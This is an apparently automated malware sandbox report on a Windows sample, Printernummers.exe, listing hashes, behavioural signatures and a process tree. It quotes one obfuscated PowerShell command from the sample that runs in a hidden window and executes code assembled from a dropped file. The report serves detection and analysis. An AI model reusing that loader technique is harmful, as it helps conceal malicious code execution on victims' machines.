Analysis

Max time kernel: 94s
Max time network: 16s
Platform: windows7_x64
Resource: win7-20240729-en
Resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
Submitted: 24-12-2024 12:41
Static task: static1

Behavioral task: behavioral1
  Sample: Printernummers.exe
  Resource: win7-20240729-en

Behavioral task: behavioral2
  Sample: Printernummers.exe
  Resource: win10v2004-20241007-en

Behavioral task: behavioral3
  Sample: $PLUGINSDIR/nsExec.dll
  Resource: win7-20241023-en

Behavioral task: behavioral4
  Sample: $PLUGINSDIR/nsExec.dll
  Resource: win10v2004-20241007-en
General

Target: Printernummers.exe
Size: 770KB
MD5: 5e2ff1914fc1f8ebadf282f4096d6fc8
SHA1: 77d61bdf0ce63eed5324b56623b878fc3dc79890
SHA256: f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d
SHA512: e70121837b94ba002dc2093afcebed4ec1d3f90d46d1466fe66e4f0bd16a9426d58547946ef7f420c937017deb650c5705c7792f6047de68918f018b7ec4d916
SSDEEP: 12288:6DGZKmormA1FvvLR3x8rqDFXlo3KsAYzjDCwonXnWMIk2CyLuuOSFBPpJh/gpcXF:4mor/1t8uTooHNnXWMIdCkOqXPgKP9
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell and hides the display window.
  PID 1904, process powershell.exe

- Loads dropped DLL (1 IoC)
  PID 376, process Printernummers.exe

- Drops file in Windows directory (1 IoC)
  File opened for modification: C:\Windows\resources\unthick.ini, process Printernummers.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, process Printernummers.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, process powershell.exe

- Suspicious behavior: EnumeratesProcesses (1 IoC)
  PID 1904, process powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, PID 1904, process powershell.exe

- Suspicious use of WriteProcessMemory (4 IoCs)
  PID 376 wrote to memory of 1904 (Printernummers.exe, procid_target 30)
  PID 376 wrote to memory of 1904 (Printernummers.exe, procid_target 30)
  PID 376 wrote to memory of 1904 (Printernummers.exe, procid_target 30)
  PID 376 wrote to memory of 1904 (Printernummers.exe, procid_target 30)
Processes

1. C:\Users\Admin\AppData\Local\Temp\Printernummers.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\Printernummers.exe"
   PID: 376
   - Loads dropped DLL
   - Drops file in Windows directory
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of PID 376)
      Command line: powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\Admin\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "
      PID: 1904
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network

MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 33B
  MD5: e23f52386361095bdb7040b09e2216ae
  SHA1: 91f31dd82ab80140db621b6dce0b9b5d6b568723
  SHA256: 36467321184a76e0fea592d2896856a37ec18fc8480de66f05d719d93b39d070
  SHA512: 19d18de54b3466f0d283271786b3b308c3be07f21174c46563c4c16292716c52f2c1b85f416ed77143ea6847bfc4c4c37f22296948eac47499276b181f129b9c

- Filesize: 6KB
  MD5: 1b0e41f60564cccccd71347d01a7c397
  SHA1: b1bddd97765e9c249ba239e9c95ab32368098e02
  SHA256: 13ebc725f3f236e1914fe5288ad6413798ad99bef38bfe9c8c898181238e8a10
  SHA512: b6d7925cdff358992b2682cf1485227204ce3868c981c47778dd6da32057a595caa933d8242c8d7090b0c54110d45fa8f935a1b4eec1e318d89cc0e44b115785